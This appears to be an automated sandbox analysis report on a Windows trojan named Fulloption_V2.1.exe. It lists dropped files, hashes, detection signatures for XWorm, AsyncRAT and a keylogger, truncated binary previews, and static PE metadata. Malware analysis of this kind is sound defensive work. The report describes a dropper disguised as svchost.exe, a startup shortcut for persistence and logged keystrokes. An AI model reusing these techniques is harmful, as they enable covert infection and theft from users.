                                                                                SHA-512:F7B56B96A2DCDA223668D82BC8DD7C5A0E7E5786AACAD6A0BEC809E8525E383B9A85F9E834CF29636FCDB84CCE97CF4AD996F9D2CC827C189A2C06BAEC661A53
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\svchost.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\svchost.exe, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\svchost.exe, Author: ditekSHen
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 84%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....(g.............................;... ...@....@.. ....................................@.................................p;..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................;......H........c..X.......&.....................................................(....*.r...p*. ....*..(....*.rA..p*. S...*.s.........s.........s.........s.........*.r...p*. ....*.r...p*. ..e.*.r...p*. E/..*.rA..p*. .q..*.r...p*. ....*..((...*.r...p*.r...p*. *p{.*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*. ...*.r_..p*. ^...*.r...p*. ....*.r...p*.r...p*.r_..p*. z...*.r...p*.r...p*. O...*.r..
                                                                                Process:C:\Users\user\Desktop\Fulloption_V2.1.exe
                                                                                File Type:CSV text
                                                                                Category:dropped
                                                                                Size (bytes):654
                                                                                Entropy (8bit):5.380476433908377
                                                                                Encrypted:false
                                                                                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                Malicious:true
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                Process:C:\ProgramData\svchost.exe
                                                                                File Type:CSV text
                                                                                Category:dropped
                                                                                Size (bytes):654
                                                                                Entropy (8bit):5.380476433908377
                                                                                Encrypted:false
                                                                                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                Malicious:false
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:modified
                                                                                Size (bytes):64
                                                                                Entropy (8bit):0.34726597513537405
                                                                                Encrypted:false
                                                                                SSDEEP:3:Nlll:Nll
                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                Malicious:false
                                                                                Preview:@...e...........................................................
                                                                                Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:modified
                                                                                Size (bytes):94
                                                                                Entropy (8bit):4.526849223511721
                                                                                Encrypted:false
                                                                                SSDEEP:3:rRSFzVowiaGIF2cWRA4kvRovNsr4ryyAFYJKXzovNsra:EF5BxGIF2RUZoWrcyyAFYJKDoWra
                                                                                MD5:9C280D191DBCF46E65ECE3D7061D8CC8
                                                                                SHA1:9D5B381E516455F717678992E6D431FFDE136A2C
                                                                                SHA-256:E0099B6480A085315677DD3ED14B81CA0F794EAA3063878942AAFA366A865478
                                                                                SHA-512:90378A0DFC76C8B0DAE30580F5D2ACA852BB68388CBE4B292B3CF10C056A521D8960D071CC99C701203AAA873ECFE7A861101F905D10E1D7754DC03B49B86FCE
                                                                                Malicious:false
                                                                                Preview:....### FullOption_2.1Xenos.exe - System Error ###..[WIN]r[WIN]r....### explorer ###..[WIN]r
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Users\user\Desktop\Fulloption_V2.1.exe
                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):4065792
                                                                                Entropy (8bit):7.424835087460422
                                                                                Encrypted:false
                                                                                SSDEEP:49152:2cJxbsVO7Px8CBHIx5zosKv+gBQtnFfPq2IPF1QSO23dwoQB1cBYATrxl0czt:2cXsOKCdI9cf28F1QSbtwPalNl02
                                                                                MD5:2F6E9C0DD1C6859A9D6E7ACEA1DB9AC0
                                                                                SHA1:B0DCD2BE62B6A559E479DE7745AB0988B8B30522
                                                                                SHA-256:122E3CB0F2AD233D1A364911D433667E7778F00D9A7D10B954C994F4E8093D1F
                                                                                SHA-512:FE3634F46AFD5B45F0FFC721A18B5EF1B1344B548F90B8C54EA6995E3D64B7394B56C681B1A0522B67E862FCE9D8333B621612A2F03708E7DBC917A28C58C15D
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe, Author: Joe Security
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 68%
                                                                                Joe Sandbox View:
                                                                                • Filename: 4QnTBz8fN3.exe, Detection: malicious, Browse
                                                                                Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$........#V7_B8d_B8d_B8dV:.dIB8dO..dVB8dO.;e[B8dO.<eUB8dO.=ewB8dO.9eYB8d.2<e6B8d.><e]B8d.>=e]B8d.;<eEB8d.:>e^B8d.:9e{B8d...dVB8d_B9d|@8d..1eNB8d...d^B8d..:e^B8dRich_B8d........................PE..d...[1.f.........."....).....,(................@..............................>...........`.................................................@l.......@>......`=..............P>.P"......p.......................(...`...@............0..(............................text............................... ..`.rdata...u...0...v..................@..@.data.....!......t!.................@....pdata.......`=.......=.............@..@.rsrc........@>.......=.............@..@.reloc..P"...P>..$....=.............@..B........................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Nov 20 08:38:07 2024, mtime=Wed Nov 20 08:38:07 2024, atime=Wed Nov 20 08:38:07 2024, length=75264, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):663
                                                                                Entropy (8bit):4.585591701388686
                                                                                Encrypted:false
                                                                                SSDEEP:12:8ot/sscl5IH9AbelVsTCEjAPciIsbdiwB99n9BmV:84/GwAbmsTCQAkkdFB9R9Bm
                                                                                MD5:A5A7340F991BCC486C72D6D7E456BAE3
                                                                                SHA1:22C6F9A149B4D3143D743F757BE61DCB3AB87ECA
                                                                                SHA-256:878817F167EEA7920B6E29FE4EAFB86CCB1F93064A99546CB5BB9DD0E432B507
                                                                                SHA-512:9CB6062694B24D3D1E45E011D8A3694581FAFF7EDA865EF997A23F441F56B38D93B0A67D2D2EFC568B3D5C827553AB659F5C9CD00642B80C815E961DAFA02F42
                                                                                Malicious:false
                                                                                Preview:L..................F.... ..#1../;..#1../;..#1../;...&...........................P.O. .:i.....+00.../C:\...................`.1.....tY.L. PROGRA~3..H......O.ItY.L....g......................]v.P.r.o.g.r.a.m.D.a.t.a.....b.2..&..tY.L svchost.exe.H......tY.LtY.L....!......................N..s.v.c.h.o.s.t...e.x.e.......I...............-.......H...........6..&.....C:\ProgramData\svchost.exe..2.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.s.v.c.h.o.s.t...e.x.e.`.......X.......721680...........hT..CrF.f4... ..W@.#....-...-$..hT..CrF.f4... ..W@.#....-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                Process:C:\Users\user\Desktop\Fulloption_V2.1.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):75264
                                                                                Entropy (8bit):5.976607627301734
                                                                                Encrypted:false
                                                                                SSDEEP:1536:jSJd0NZZ4CuyMAa70b36MJP6ROuEn9i8:+J3C1ba70b3xYOuEn48
                                                                                MD5:12B722899C9A6B517D52B8DE2C7C3E2E
                                                                                SHA1:A92DBC8EDD02ADEEAB5FA9C0E2A884A84A315FE5
                                                                                SHA-256:57EC7BCA087DD678BEF5AEAAA52F4F393D63613976701E6A111015FB7F9F1B6C
                                                                                SHA-512:F7B56B96A2DCDA223668D82BC8DD7C5A0E7E5786AACAD6A0BEC809E8525E383B9A85F9E834CF29636FCDB84CCE97CF4AD996F9D2CC827C189A2C06BAEC661A53
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 84%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....(g.............................;... ...@....@.. ....................................@.................................p;..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................;......H........c..X.......&.....................................................(....*.r...p*. ....*..(....*.rA..p*. S...*.s.........s.........s.........s.........*.r...p*. ....*.r...p*. ..e.*.r...p*. E/..*.rA..p*. .q..*.r...p*. ....*..((...*.r...p*.r...p*. *p{.*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*. ...*.r_..p*. ^...*.r...p*. ....*.r...p*.r...p*.r_..p*. z...*.r...p*.r...p*. O...*.r..
                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):7.965324524688038
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                File name:Fulloption_V2.1.exe
                                                                                File size:4'400'640 bytes
                                                                                MD5:9f53cc8bc6cb459cb3c5ccc0d54812d6
                                                                                SHA1:f18cda32845d3daecf694457a92f614931695c50
                                                                                SHA256:aa1a013b0b9dba1edcac0096c8bd847cf50126cc719e5ec8e1d7311ef37b97f8
                                                                                SHA512:0047d8a7035148466f6b52ff7c9ea85d72075bbcda891192aedef0e2c2a18e1f90697cef7b5f5558a973e5214d754b483da2f35331974a521f7dbab5391c562a
                                                                                SSDEEP:98304:0er3mJdJ0Gz+yQ3zkgHC3lD1qhPEeXkZGRaGxOJx1/qV:JSJdJrz+yOkg8BQPfXYoI1q
                                                                                TLSH:D71601E15A22BB47D2B5B77AD738D2033D049863E723545C2FF09380A939C19EF695E8
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...4.(g.................b?.........>.?.. ....?...@.. ........................C...........@................................
                                                                                Icon Hash:464028d6d4891906
                                                                                Entrypoint:0x7f803e
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x67280634 [Sun Nov 3 23:24:36 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
